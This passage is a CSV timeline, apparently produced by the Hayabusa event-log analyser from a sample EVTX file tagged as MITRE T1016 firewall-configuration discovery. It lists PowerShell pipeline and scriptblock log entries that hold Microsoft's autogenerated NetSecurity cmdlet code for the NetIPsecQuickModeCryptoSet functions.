($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvoca",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tionInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Copy-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, 
[Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent 
= $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 
@('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains 
